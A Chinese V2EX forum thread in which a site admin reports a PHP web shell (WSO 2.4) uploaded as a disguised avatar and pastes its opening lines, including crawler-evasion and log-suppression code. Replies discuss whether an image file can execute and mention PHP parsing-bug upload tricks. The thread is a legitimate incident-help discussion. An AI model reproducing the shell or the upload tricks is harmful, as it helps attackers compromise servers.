小站被挂马了。。。

2013-03-11 18:02:10 +08:00
 GASALA
一个小论坛,用的是thinksaas,对方注册账号,上传头像(伪装木马),直接打头像网址显示部分代码如下:

<?php # Web Shell by oRb
$auth_pass = md5("123456");
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}

@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.4');

....................

请问怎样判断对方是否拿到了权限呢?
3854 次点击
所在节点    站长
10 条回复
jimmy2010
2013-03-11 18:15:11 +08:00
这样的木马是不起作用的吧,代码都没运行
GASALA
2013-03-11 18:21:32 +08:00
@jimmy2010 打开那个人注册的页面杀软会弹出提示。。。

我只贴出了一部分代码。。。你的意思是他这个马没有执行吗?
icevil
2013-03-11 18:39:46 +08:00
@GASALA 杀软是特征码识别,所以会弹出提示。
除非你设置了.jpg等图片后缀解析为php,否则这样的静态文件是不会执行的吧。
GASALA
2013-03-11 18:45:43 +08:00
@icevil 谢谢。这方面白痴。

如果不能执行,那对方上传这段代码的意图是什么呢?
icevil
2013-03-11 19:28:29 +08:00
@GASALA 估计测试漏洞什么的吧,具体还要上传的人来回答。。
你后台查询上传这头像的账号的ip然后block啊~
jybox
2013-03-11 19:37:24 +08:00
这个黑阔很可能已经得手了,现在他可以远程执行命令,至于是root权限还是www-data的权限,要看你的服务器的权限配置.

他很可能在不止一个文件中挂了后门.
GASALA
2013-03-11 19:47:56 +08:00
@jybox 对比之后没发现有系统文件被修改过。。。我已经删除了那个伪装的文件。

请问怎样知道有没有登入过root或者怎么知道对方是否拥有了权限?
jimmy2010
2013-03-11 22:00:47 +08:00
@jybox
@GASALA
不用惊慌,jpg格式的文件在可解析php的服务器上是不会被解析的。对方在测试能否上传木马而已,除非将木马以.php格式上传,才有可能执行。或者利用php的解析漏洞,上传成XX.php.rar之类的,也可以执行。总之,纯图片不用担心,不管图片的内容是什么,只要确保.jpg这个后缀无法修改就行
1314258
2013-03-11 22:35:38 +08:00
别以为jpg不会执行。
notsobad
2013-03-12 00:34:36 +08:00

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/62605

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX